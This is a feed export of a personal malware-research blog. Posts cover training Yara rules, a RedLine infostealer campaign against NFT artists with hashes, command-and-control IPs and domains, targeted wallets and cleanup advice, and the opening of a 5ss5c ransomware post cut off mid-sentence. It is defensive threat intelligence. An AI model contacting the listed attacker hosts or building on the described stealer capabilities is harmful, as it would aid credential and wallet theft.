tag:blogger.com,1999:blog-6062826769557481552024-03-18T10:47:49.257+01:00Blaze's Security BlogPersonal blog about internet & malware threats.Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.comBlogger129125tag:blogger.com,1999:blog-606282676955748155.post-53591445973282853052023-12-04T20:09:00.006+01:002023-12-04T20:14:59.311+01:00Fara: Faux YARA<p><span>FARA, or Faux YARA, is a simple repository that contains a set of purposefully erroneous Yara rules. It is meant as a training vehicle for new security analysts, those that are new to Yara and even Yara veterans that want to keep their rule writing (and debugging) sharp.</span></p><p><br /></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiVy_MyqCt2XMu8zOAMzdoPVBOVxq69x_Nblu6mF2S-p5FBR4UtVFL1aL3E5xN_AbAyeA_ZS0GDbGubIB2uzE5FRbd7e3lmsGLvrlS68v_8WbERkfN15QWK8jBC-jGmgZOZCdqX1cvTot2MgHcKUGlVzabXwL68iI5J0wPe9rJH0cDFDZsRyGAeQlf-QPIH" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="192" data-original-width="330" height="186" src="https://blogger.googleusercontent.com/img/a/AVvXsEiVy_MyqCt2XMu8zOAMzdoPVBOVxq69x_Nblu6mF2S-p5FBR4UtVFL1aL3E5xN_AbAyeA_ZS0GDbGubIB2uzE5FRbd7e3lmsGLvrlS68v_8WbERkfN15QWK8jBC-jGmgZOZCdqX1cvTot2MgHcKUGlVzabXwL68iI5J0wPe9rJH0cDFDZsRyGAeQlf-QPIH" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Example "faux" rule</td></tr></tbody></table><br /><br /><p></p><p><span>Find it over on Github:</span></p><p><span style="color: #1f2328;"><a href="https://github.com/bartblaze/FARA">https://github.com/bartblaze/FARA</a> </span></p><div><span style="color: #1f2328;"><br /></span></div>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-12191973765117006352022-12-10T16:20:00.004+01:002022-12-10T16:20:41.556+01:00Yara rules collection<p>Quite a while ago, I've published some of my private Yara rules online, on Github. </p><p>They can be found here:</p><p><a href="https://github.com/bartblaze/Yara-rules">https://github.com/bartblaze/Yara-rules</a></p><p dir="auto">There's two workflows running on that Github repository:</p>
<ul dir="auto"><li><a href="https://yara-ci.cloud.virustotal.com/" rel="nofollow">YARA-CI</a>: runs automatically to detect signature errors, as well as false positives and negatives.</li><li><a href="https://github.com/bartblaze/Yara-rules/blob/master/.github/workflows/yara.yml">Package Yara rules</a>:
allows download of a complete rules file (all Yara rules from this repo
in one file) for convenience from the Actions tab > Artifacts (see
image below).</li></ul>
<p dir="auto"><a href="https://user-images.githubusercontent.com/3075118/113322817-731feb00-9315-11eb-86ab-94f133f07038.png" rel="noopener noreferrer nofollow" target="_blank"><img alt="image" src="https://user-images.githubusercontent.com/3075118/113322817-731feb00-9315-11eb-86ab-94f133f07038.png" style="max-width: 100%;" /></a></p><p>The Yara rules are divided into:</p><ul style="text-align: left;"><li>APT</li><li>Crimeware</li><li>Generic</li><li>Hacktools</li><li>Ransomware<br /></li></ul><p>Furthermore, the rules can work natively with <a href="https://www.cyber.gc.ca/en/tools-services/assemblyline" rel="nofollow">AssemblyLine</a> due to the CCCS Yara rule standard adoption.</p><p>PR's are welcome where you see fit. <br /></p>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-73262852517387766772021-06-14T21:30:00.013+02:002021-06-24T09:52:25.506+02:00Digital artists targeted in RedLine infostealer campaign<div class="separator"><p><i>2021-06-17: updated with information from Twitter user ARC</i> <br /></p><p>In this post, we'll look at a campaign, that targeted multiple 3D or digital artists using NFT, with malware named <b>RedLine</b>. This malware is a so called "infostealer" or "information stealer" that is capable of extracting sensitive data from your machine (such as wallet information, credentials, and so on). As a side-note; NFTs, or non-fungible tokens, are digital tokens tied to assets that can be bought, sold and traded.<br /></p></div><p>This blog post is divided into four parts:</p><ul style="text-align: left;"><li><a href="#Introduction">Introduction</a>: provides an overview of what happened<br /></li><li><a href="#Analysis">Analysis</a>: analysis of the attack and the malware used<br /></li><li><a href="#Detection">Detection</a>: how to detect and remove the malware (skip to Detection if you just want to clean this up)<br /></li><li><a href="#Prevention">Prevention</a>: how to prevent this from happening again<br /></li><li><a href="#Conclusion">Conclusion</a>: a brief conclusion and additional thoughts <br /></li></ul><h3 id="Introduction" span="" style="text-align: left;">Introduction</h3><p style="text-align: left;">From at least last Thursday, 10th of June 2021, multiple users report on Twitter that they got hacked after being approached to create new digital art. These users, accomplished digital artists and publishing their work on NFT marketplaces, were approached either via Instagram, Twitter DM (message) or directly via email. The attacker has masqueraded themselves behind multiple personas, often claiming to be from South Korea. A few of the users that reported the attack:</p><p><br /></p><p>Ariel:<br /></p>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">Small thread on the recent attacks to NFT artists, and how to prevent it. <a href="https://twitter.com/hashtag/NFTLamers?src=hash&ref_src=twsrc%5Etfw">#NFTLamers</a> <a href="https://twitter.com/hashtag/StolenNFT?src=hash&ref_src=twsrc%5Etfw">#StolenNFT</a> <a href="https://twitter.com/hashtag/NFTArt?src=hash&ref_src=twsrc%5Etfw">#NFTArt</a> <a href="https://t.co/KvrsuyQaeT">pic.twitter.com/KvrsuyQaeT</a></p>— 🌈 ArielBeckerArt.eth #SquidGang 🦑 (@arielbeckerart) <a href="https://twitter.com/arielbeckerart/status/1403104091857985537?ref_src=twsrc%5Etfw">June 10, 2021</a></blockquote><p> </p><p>fvckrender:</p><p><br /></p> <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">Be really careful out there I was dumb enough to not overlook this and open their SCR file and got my metamask swiped from à to Z all my tokens gone. They tried to access other app but my 2fa blocked them to. I’m an idiot don’t me an idiot like me and secure your shit. <a href="https://t.co/gAins00taH">pic.twitter.com/gAins00taH</a></p>— FVCKRENDER (@fvckrender) <a href="https://twitter.com/fvckrender/status/1403471996017541120?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote><p> </p><p>Nicole:</p><p> <br /></p> <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">Really terrible day. My Metamask got hacked and now my <a href="https://twitter.com/withFND?ref_src=twsrc%5Etfw">@withFND</a> account is compromised. Opened a scam project proposal with a .scr file and a Microsoft Word icon. Anyone experience this before? Trying to figure out what to do</p>— Nicole Ruggiero (@_NicoleRuggiero) <a href="https://twitter.com/_NicoleRuggiero/status/1403500537723641859?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote><p> </p><p>ARC:</p><p> <br /></p>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">New scam just dropped, specifically targeting artists, the file seems to be a virus <a href="https://t.co/IFv8N5RBSg">pic.twitter.com/IFv8N5RBSg</a></p>— ARC (@arc4g) <a href="https://twitter.com/arc4g/status/1403400865373986823?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote> <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<p> </p><p>Cloudy Night:</p><p> <br /></p> <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">WARNING TO ALL ARTISTS<br />Got a DM from "John Billmate" claiming to be "Responsible for distribution of photo editor" from <a href="https://twitter.com/SkylumSoftware?ref_src=twsrc%5Etfw">@SkylumSoftware</a> <br /><br />DO NOT OPEN ANY LINKS FROM THIS PERSON. This is a scam, and if you got this DM, or get a dm in the future, block it. <a href="https://twitter.com/hashtag/NFTCommunity?src=hash&ref_src=twsrc%5Etfw">#NFTCommunity</a> <a href="https://twitter.com/hashtag/skylum?src=hash&ref_src=twsrc%5Etfw">#skylum</a> <a href="https://t.co/yQv68bRIjW">pic.twitter.com/yQv68bRIjW</a></p>— Cloudy Night ☁️ (@CloudyNight_k) <a href="https://twitter.com/CloudyNight_k/status/1403467670394081281?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote><p> </p><p>There are many, many more examples - however, we won't list them here. Of note is Ariel's tweet, where you can note the presence of a file named "<b>Rizin_Fight_Federation_Presentation.scr</b>". I'll circle back to that in the next section, Analysis.</p><p><br /></p><h3 id="Analysis" span="" style="text-align: left;">Analysis</h3><p>After scouring the internet for a while, I was unable to discover any of the files mentioned by the artists that reported the attack, that is until I stumbled upon Cloudy Night's tweet - their screenshot included a link to a website "skylumpro.com".</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9ZHKOAwrOKk/YMetT4AfVhI/AAAAAAAACiM/Bad8tnWFUrUICqp8wZb9S-w-RKfmEgdCACLcBGAsYHQ/s1599/website.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="792" data-original-width="1599" height="198" src="https://1.bp.blogspot.com/-9ZHKOAwrOKk/YMetT4AfVhI/AAAAAAAACiM/Bad8tnWFUrUICqp8wZb9S-w-RKfmEgdCACLcBGAsYHQ/w400-h198/website.PNG" width="400" /></a></div><br /><p><br /> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p>As expected, this is not the legitimate website, but rather a clever copycat of the real Skylum product website (to note, the real website is: <a href="https://skylum.com/luminar-ai-b" target="_blank">https://skylum.com/luminar-ai-b</a>). After clicking the "Download Now" button, a file named "<b>SkylumLuminar (NFT Beta).rar</b>" <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>is downloaded, which you need to unzip with the password "NFT", as we can observe from Cloudy Night's tweet.</p><p>The unzipped content looks as follows:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-uDB0F3oRdH8/YMetaRwPU0I/AAAAAAAACiU/iSjEHDKr6Z8ukiUjc2KIufBEMLNJf_65QCLcBGAsYHQ/s1027/files.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="567" data-original-width="1027" height="221" src="https://1.bp.blogspot.com/-uDB0F3oRdH8/YMetaRwPU0I/AAAAAAAACiU/iSjEHDKr6Z8ukiUjc2KIufBEMLNJf_65QCLcBGAsYHQ/w400-h221/files.PNG" width="400" /></a></div><br /><p><br /> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p>One of the first things you may notice is the large filesize of the so called beta version. As you've seen from before in Ariel's tweet, the filesize was 745MB, while this file is a whopping 791MB!</p><p>But why is this file so large and why does it matter? </p><ul style="text-align: left;"><li>The attacker has appended their original file with a large chunk of <i>overlay</i> data; to put it simply - a bunch of extra data that does nothing.</li><li>The attacker has increased the filesize this much to try and evade antivirus software and scanning tools; for example, a well-known service to scan suspicious files, <a href="https://www.virustotal.com/gui/home/upload" target="_blank">VirusTotal</a>, only accepts files up to 650MB, while some antivirus scanners may not even scan a file this large.</li><li>While you could upload the original RAR file; the attacker has password-protected it and VirusTotal will be unable to scan it properly. You could re-package it, but the file itself may not be scanned.</li></ul><p>Having said all that, after removing the excessive overlay, a much more reasonable filesize is obtained: 175KB. This new file's properties are:</p><ul style="text-align: left;"><li>MD5: d93de731781723b3bb43fa806c5da7d1</li><li>SHA-1: 1d49e7d163bce8cc6591ea33984796c531893b47</li><li>SHA-256: b9923cdcd07e3e490a729560aa6f7c9b153ac0359cc7fa212c65b08531575a5a</li><li>Creation Time: 2021-06-12 20:46:31</li><li>VirusTotal results: <a href="https://www.virustotal.com/gui/file/b9923cdcd07e3e490a729560aa6f7c9b153ac0359cc7fa212c65b08531575a5a/detection" target="_blank">https://www.virustotal.com/gui/file/b9923cdcd07e3e490a729560aa6f7c9b153ac0359cc7fa212c65b08531575a5a/detection</a> <br /></li></ul><p>Of note is the creation or compilation time: this is the date and time the file has originally been created. While this can be spoofed, I do not believe it is the case here. This time matches with when the attack appeared. It is however highly likely more files, such as the one in Ariel's tweet, do the round.</p><p>This file will then execute a new file; which is the RedLine infostealer malware. This file has the following properties:</p><ul style="text-align: left;"><li>MD5: b7df882c1b75c753186eec8fcb878932</li><li>SHA-1: a04339be16a3b48d06017f44db7e86b3c8982110</li><li>SHA-256: 2917305ac2959a98296578c46345691ccf638bdcc0559134432f5993da283faa</li><li>Creation Time: 2042-10-31 08:29:02</li><li>VirusTotal results: <a href="https://www.virustotal.com/gui/file/2917305ac2959a98296578c46345691ccf638bdcc0559134432f5993da283faa/detection" target="_blank">https://www.virustotal.com/gui/file/2917305ac2959a98296578c46345691ccf638bdcc0559134432f5993da283faa/detection </a><br /></li></ul><p>Note the creation time is different: set in 2042 - this is obviously faked by the attacker to reveal when exactly it has been created. However, with the above data, we can assume it was created in the last 5 days or so.<br /></p><p>As mentioned before, once you execute the <b>SkylumLuminarNFTBetaVersion.exe</b> file, you will be infected with the RedLine infostealer malware. ProofPoint has reported on this malware first in March 2020: <a href="https://www.proofpoint.com/us/blog/threat-insight/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign" target="_blank">New Redline Password Stealer Malware</a>. This malware has many capabilities, including, but not limited to:</p><ul style="text-align: left;"><li>Steal username and password from browsers;</li><li>Collect extensive system information;</li><li>Execute commands, such as downloading and uploading other files, opening links and so on;</li><li>Steal cryptowallet information - both from Chrome extensions as well as typical <i>wallet.dat </i>files. The extensions targeted are:</li><ul><li>YoroiWallet</li><li>Tronlink</li><li>NiftyWallet</li><li>Metamask (refer also to Nicole's tweet)</li><li>MathWallet</li><li>Coinbase</li><li>BinanceChain</li><li>BraveWallet</li><li>GuardaWallet</li><li>EqualWallet</li><li>JaxxxLiberty</li><li>BitAppWallet</li></ul><li>Steal data from other software, such as:</li><ul><li>Steam;</li><li>Telegram;</li><li>FTP clients such as FileZilla.</li></ul></ul><p>The screenshot below displays part of RedLine's functionalities:<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-kH9Yt6kyygg/YMethCAAvDI/AAAAAAAACiY/TJ8Ui6_KV-QPgX4fiQvJ7XJ7OZo1HhFpgCLcBGAsYHQ/s855/func.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="855" data-original-width="629" height="400" src="https://1.bp.blogspot.com/-kH9Yt6kyygg/YMethCAAvDI/AAAAAAAACiY/TJ8Ui6_KV-QPgX4fiQvJ7XJ7OZo1HhFpgCLcBGAsYHQ/w294-h400/func.PNG" width="294" /></a></div><br /><p><br /></p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p>RedLine will first gather some basic information about your machine, such as the machine name, external IP address, your geography and so on. It gathers external information by querying one of the following IP lookup services:<br /></p><ul style="text-align: left;"><li>https://api.ipify.org</li><li>https://icanhazip.com</li><li>https://wtfismyip.com/text</li><li>http://bot.whatismyipaddress.com/</li><li>http://checkip.dyndns.org </li></ul><p>Note these services are <b>not </b>malicious, they are simply being used by the attacker to gather more information. Interestingly enough, RedLine will use SOAP HTTP (POST) requests to its command and control server (the server or machine controlled by the attacker where your data will end up) using the following IP: </p><ul style="text-align: left;"><li><b>185.215.113.60</b>;</li><li>On port 59472; </li><li>This IP resides in the Seychelles.<br /></li></ul><p>Another domain and IP observed is (from ARC's tweet above, the files in that archive were almost 600MB): <br /></p><ul style="text-align: left;"><li><b>xtfoarinat.xyz</b>;</li><li>On IP 92.38.163.189;</li><li>This IP also has sinaryaror.xyz resolve to it, another RedLine command and control server.<br /></li></ul><p>One may also observe connections to tempuri.org. This is a default placeholder for web services, and is not atypical when using SOAP over HTTP. Tempuri is <b>not </b>malicious.</p><p>Finally, after receiving all this data, the attacker can start logging into your accounts, attempt to steal your tokens, impersonate you and so on. The attacker can also install other malware if they wish, such as ransomware.</p><h3 id="Detection" span="" style="text-align: left;">What now? Detection</h3><h3 id="Detection" span="" style="text-align: left;"> </h3><h4 style="text-align: left;">Good news:</h4><p style="text-align: left;">The variant discussed in this blog does not appear to <i>persist</i>: in other words, after a reboot, its process will not be active anymore, at least for the variant discussed in this blog post. <br /></p><h4 style="text-align: left;">Bad news: <br /></h4><p>Everything else - unfortunately, RedLine works pretty fast and a few minutes are enough to exfiltrate all your data and for the attacker to fully compromise all your accounts. <br /></p><p>Luckily for us, RedLine stealer <i>should</i> be detected by most commercial and free antivirus software products on the market. A few recommendations to get rid of the RedLine variant discussed in this blog post - note this may not fully cover the variant you encountered:<b> </b></p><ol style="text-align: left;"><li><b>Contact</b> your NFT provider, cryptowallet provider and so on as soon as possible via <b>telephone</b> call or <b>another computer</b> and inform them of what happened; ask for a temporary block of your account or to at least temporarily block any funds from now on. <span style="color: #2b00fe;"><b><span style="color: #ffa400;"><br />>>> </span></b></span><span style="color: #ffa400;"><b>It is very important you do this first! <<<</b></span><br /><br /></li><li>If you can, <b>change your</b> <b>credentials from another machine</b>; such as your phone, your partner's laptop, ... Note it's recommended to change your credentials at least for your email accounts and for your wallets - focus on the most important accounts first! If you do not have this possibility, continue with the steps below. <br /> <br /></li><li>Open Task Manager, go to the <b>Details</b> tab and search for any process with the following names:</li><ol><li> SkylumLuminarNFTBetaVersion.exe;<br /> Flamingly.exe;<br /> FieldTemplateFactory.exe;<i><br /></i>PaintingPromoProject;<i><br /> Alternatively, the name of the file you executed</i>. </li><li>Now, kill the process by right-clicking on it > select <b>End Process </b>(or <b>End Task</b>).<br /><br /></li></ol><li>If you have a firewall or proxy, block the IPs <b>185.215.113.60 </b>and<b> 92.38.163.189</b>.<br /><br /></li><li>Run a scan with your currently installed antivirus <b>and </b>a scan with an alternative product, for example, <a href="https://www.malwarebytes.com/" target="_blank">Malwarebytes</a> (has a free version);</li><ol><li>You can also use Eset's Online Scanner (free): <a href="https://www.eset.com/int/home/online-scanner/" target="_blank">https://www.eset.com/int/home/online-scanner/</a> <br /><br /></li></ol><li>Enable the Windows Firewall: <a href="https://support.microsoft.com/en-us/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f" target="_blank">https://support.microsoft.com/en-us/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f</a></li><ol><li>While this might not have much impact at this point, it will give you an additional layer of protection from other threats;<br /> <br /></li></ol><li><b>Delete</b> all the files you have previously downloaded if they still exist on your system; if you'd like me to analyse them, you may send me a copy first;<br /><br /></li><li>If the above scans have turned up:</li><ul><li><b>Clean</b>: have you executed the file? </li></ul><ol><ol><li>If not, you are <b>not </b>infected. </li><li>If you did, and the scanners turn up with nothing, it's possible your current antivirus product has blocked the attack. </li><li>You might also want to <a href="https://support.microsoft.com/en-us/windows/how-to-refresh-reset-or-restore-your-pc-51391d9a-eb0a-84a7-69e4-c2c1fbceb8dd" target="_blank">Refresh your PC</a> to have peace of mind.</li></ol></ol><ul><li><b>Not clean </b>(there were detections): let the above product (e.g. Malwarebytes or Eset) clean them up and reboot your computer.<br /><br /></li></ul><li>Finally, <b>reset all </b>(or the rest of) <b>your credentials</b>. Do this only when you know your machine is clean! Alternatively, reset your credentials from another machine as indicated earlier.</li></ol><p>It's important to follow these steps as soon as possible to prevent any damages. </p><p><br /></p><h3 id="Prevention" span="" style="text-align: left;">Prevention<br /></h3><p>You've come this far, or perhaps you simply skipped to this part - arguably the most important one: <b>to</b> <b>prevent this attack from happening in the first place</b>. So how can this be achieved?</p><ol style="text-align: left;"><li>First and foremost: <b>ensure you are using Windows 8.1 or later</b>. Older Operating Systems, such as Windows 7, are no longer supported by Microsoft and have additional vulnerabilities attackers may exploit;<br /><br /></li><li><b>Install an antivirus</b> and enable the Windows Firewall. <b>It does not matter if the antivirus is free or not</b>; paid versions do offer more features, but a free version will do just as much.</li><ol><li>Starting from Windows 10, Windows Defender should protect adequately from attacks such as the one described in this blog post. Other free alternatives are Kaspersky's free cloud antivirus and Malwarebytes.</li><li>When you get any file, scan it with your antivirus first! (typically done by right-clicking on the file or folder) </li><li>When in doubt, upload the file to VirusTotal. Note however the tactics used here: if there's a really large file, it
may not be able to be scanned properly - this can be an indication of
malicious intent!<br /><br /></li></ol><li><b>Set UAC (User Account Control) to the maximum level</b>: Always Notify - this will stop some additional attacks (you will get more prompts; if you do, take a pause and verify what's on the screen should indeed be executed). Here's how to do that: <a href="https://www.digitalcitizen.life/how-change-user-account-control-uac-levels/" target="_blank">https://www.digitalcitizen.life/how-change-user-account-control-uac-levels/<br /></a><br /></li><li><b>Enable file extensions</b>: some extensions, such as <b>.scr</b>, historically a <i>screensaver</i> file; are in fact executables - which could contain malicious code, as was the case in Ariel's tweet. Do <b>not </b>open or run these files. This will also protect you against the "double extensions" trick. A file named <i>commission.jpg.exe</i> will now be visible as such - if file extensions are disabled, you would see <i>commission.jpg</i> - see the difference? Here's how you can enable file extensions: <a href="https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/" target="_blank">https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/<br /><br /></a></li><li><b>Create unique passwords</b> where possible; if feasible; use a password manager;<br /><br /></li><li><b>Enable MFA</b> (or 2FA if MFA is not available) on all your sensitive accounts; this will add an additional layer which is typically very hard for the attacker to guess or crack. Google "your service/ account + MFA" for specific instructions; <br /><br /></li><li>If you receive a new commission or request to create art, <b>stop and think first</b> - ask yourself these questions:</li><ol><li>Is this coming from a reputable account or from a totally new account?</li><ol><li>If reputable, can I verify their claim or request somehow?</li><li>If from a new account: be extra wary!</li><li>If from an account with very low followers/following: be extra wary! <br /></li></ol><li>How will they pay me? </li><ol><li>Are they using a verified cryptowallet, or trying to set me up for something shady?</li><li>Do they have any reviews on their (public) profile, if any? </li></ol><li>What are they asking of me exactly?</li><ol><li>Are they indeed sending just images, or is there an executable file or "special software" I am supposed to download/open? <br /></li></ol><li>Where are their links or attachments leading to?</li><ol><li>Are these leading to another service, e.g. imgur.com, or something different altogether? <br /></li></ol><li>I have downloaded the file(s), but I do not trust the source;</li><ol><li>Delete it or ask for more information;</li><li>Block the sender if you are suspect and report their account, delete any files;</li><li>You can double-check by scanning the files with your antivirus, or uploading it to VirusTotal. The same nuance as above applies however.</li></ol><li>You can also Google any information they send through to further verify their claims.<br /><br /></li></ol><li><b>Finally </b>and where possible;</li><ol><li>Use a hardware instead of software wallet;</li><li>Secure your seed phrase; store it offline, for example, on an external drive or use pen and paper;</li><li>Verify the security settings in your wallet or crypto provider: perform a check of which other security features you can enable, and enable them. </li></ol></ol><p> </p><p>Manifold, a company that creates blockchain products for NFT communities, has also written an <b>excellent </b>post-mortem of this attack which includes additional advice - I highly recommend you to read it: <a href="https://manifoldxyz.substack.com/p/the-fvckrender-hack-post-mortem" target="_blank">https://manifoldxyz.substack.com/p/the-fvckrender-hack-post-mortem</a></p><p> </p><div><h3 id="Conclusion" span="" style="text-align: left;">Conclusion and afterthoughts</h3><p>It's not the first time a highly targeted or specific attack occurs on communities that use crypto in some form or another, for example, at the end of 2019, Monero's download site and binaries <a href="https://bartblaze.blogspot.com/2019/11/monero-project-compromised.html" target="_blank">were compromised for a brief time</a>.</p><p>If you have been targeted by this attack, and you have been compromised, follow the advice in this blog as soon as possible to clean it up and to prevent any future attack.<br /></p><p>This attack was quite specific and targeted - there is really no need to feel bad if you have been affected, as it can happen to anyone. Explain to your crypto provider what happened, and they should be able to help you out.</p><p>I'd like to thank all the vigilant users on Twitter out there for creating awareness, and I hope this blog has provided further insight. If you were affected, and you'd like me to analyse any suspicious file, or would just like to comment, use the comment section below or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>. Refer to my <a href="https://bartblaze.blogspot.com/p/about.html" target="_blank">About me</a> page for even more contact details.<br /></p></div>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-35506160155529784782020-11-23T21:33:00.003+01:002023-03-01T13:22:26.034+01:00Blue Team Puzzle<p>Several years ago, I created a "malware puzzle" - basically, a crossword puzzle but with terms related to malware. You can find that puzzle here: <a href="https://bartblaze.blogspot.com/2013/08/malware-puzzle.html" target="_blank">https://bartblaze.blogspot.com/2013/08/malware-puzzle.html</a></p><p>Seeing crosswords are a hobby of mine, I thought it'd be fun to create another one more than seven years later - this time, all things blue team! Obviously you don't need to be part of a blue team to fill in the puzzle, it's for anyone in information or cyber security - but it does help if you've been on the defense side of things.</p><p>You can print the puzzle and fill it in, or you can use Adobe Reader to complete the PDF version, or use any tool to your liking (mspaint is also a candidate). There are no spaces - all words are one word.</p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PnE9TtleDF8/X7wWGEv9QQI/AAAAAAAACbo/BQUSLKDKm0YOUHFXvsIY_N46gNYgroPfwCLcBGAsYHQ/s1203/crossword-iiRh073oLn.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1203" data-original-width="681" height="320" src="https://1.bp.blogspot.com/-PnE9TtleDF8/X7wWGEv9QQI/AAAAAAAACbo/BQUSLKDKm0YOUHFXvsIY_N46gNYgroPfwCLcBGAsYHQ/s320/crossword-iiRh073oLn.png" /></a></div><br /><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p><br /></p><p>You can find the puzzle in the following formats:</p><p>PNG: <a href="https://www.mediafire.com/view/0iuzvxal8redjz2/crossword-iiRh073oLn.png/file" target="_blank">https://www.mediafire.com/view/0iuzvxal8redjz2/crossword-iiRh073oLn.png/file</a></p><p>PNG mirror: <a href="https://imgur.com/a/ASATRXf" target="_blank">https://imgur.com/a/ASATRXf</a></p><p>PDF: <a href="https://www.mediafire.com/file/b3v7pebohp6c8vn/crossword-xp6dZUU9Ar.pdf/file" target="_blank">https://www.mediafire.com/file/b3v7pebohp6c8vn/crossword-xp6dZUU9Ar.pdf/file</a></p><p>PDF mirror: <a href="https://www.filedropper.com/crossword-xp6dzuu9ar" target="_blank">https://www.filedropper.com/crossword-xp6dzuu9ar</a></p><p>If you have the solution, feel free to create a comment or @ me on Twitter: <a href="https://twitter.com/bartblaze" target="_blank">https://twitter.com/bartblaze</a>. </p><p>To make things more interesting, you can set up a competition between your fellow defenders to see who can complete it first!</p><p>If you're stuck, I can always send you a hint - see my About page for contact information, use Twitter, or leave a comment. Note there may be spoilers around. </p>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-91066897949494418412020-01-14T23:48:00.005+01:002020-01-21T22:02:36.302+01:00Satan ransomware rebrands as 5ss5c ransomware<div class="tr_bq">
<br /></div>
The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps <a href="https://bartblaze.blogspot.com/2018/04/maktub-ransomware-possibly-rebranded-as.html" target="_blank">Iron ransomware</a>, has now come up with a new version or rebranding named "5ss5c".<br />
<br />
In a previous blog post, <a href="https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" target="_blank">Satan ransomware adds EternalBlue exploit</a>, I described how the group behind Satan ransomware has been actively developing its ransomware, adding new functionalities (specifically then: EternalBlue) and techniques with each run. Then, it appeared the group halted operations on at least the ransomware front for several months.<br />
<br />
However, as it turns out, the group has been working on new ransomware - <b>5ss5c </b>- since at least November 2019.<br />
<br />
The following tweet got my attention:<br />
<br />
<blockquote class="twitter-tweet">
<div dir="ltr" lang="en">
🧐Unknown <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a> captured tonight from <a href="https://twitter.com/hashtag/China?src=hash&ref_src=twsrc%5Etfw">#China</a>, Encrypt only compressed files.<br />
Email:5ss5c@mail.ru<br />
ext:.5ss5c<br />
IP:61.186.243.2 58.221.158.90<a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a> <a href="https://twitter.com/Amigo_A_?ref_src=twsrc%5Etfw">@Amigo_A_</a> <a href="https://twitter.com/GrujaRS?ref_src=twsrc%5Etfw">@GrujaRS</a> <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a> <a href="https://twitter.com/Rmy_Reserve?ref_src=twsrc%5Etfw">@Rmy_Reserve</a> <a href="https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw">@VK_Intel</a> <a href="https://t.co/dTdgnMfoLX">pic.twitter.com/dTdgnMfoLX</a></div>
— onion (@jishuzhain) <a href="https://twitter.com/jishuzhain/status/1216368394485800961?ref_src=twsrc%5Etfw">January 12, 2020</a></blockquote>
<br />
After some quick checks, it appears this is a downloader for the 5ss5c ransomware, which is extremely reminiscent of how Satan ransomware operated:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-R8iszii_PsM/XhuVHj70D_I/AAAAAAAACSQ/M8n7CBNaJK0Veos1vwHaryu9j5BYNXKOACLcBGAsYHQ/s1600/iron0.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="357" data-original-width="760" height="187" src="https://1.bp.blogspot.com/-R8iszii_PsM/XhuVHj70D_I/AAAAAAAACSQ/M8n7CBNaJK0Veos1vwHaryu9j5BYNXKOACLcBGAsYHQ/s400/iron0.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - 5ss5c downloader</td></tr>
</tbody></table>
<span id="goog_1999818430"></span><span id="goog_1999818431"></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The malware will leverage certutil and even contains logging:<br />
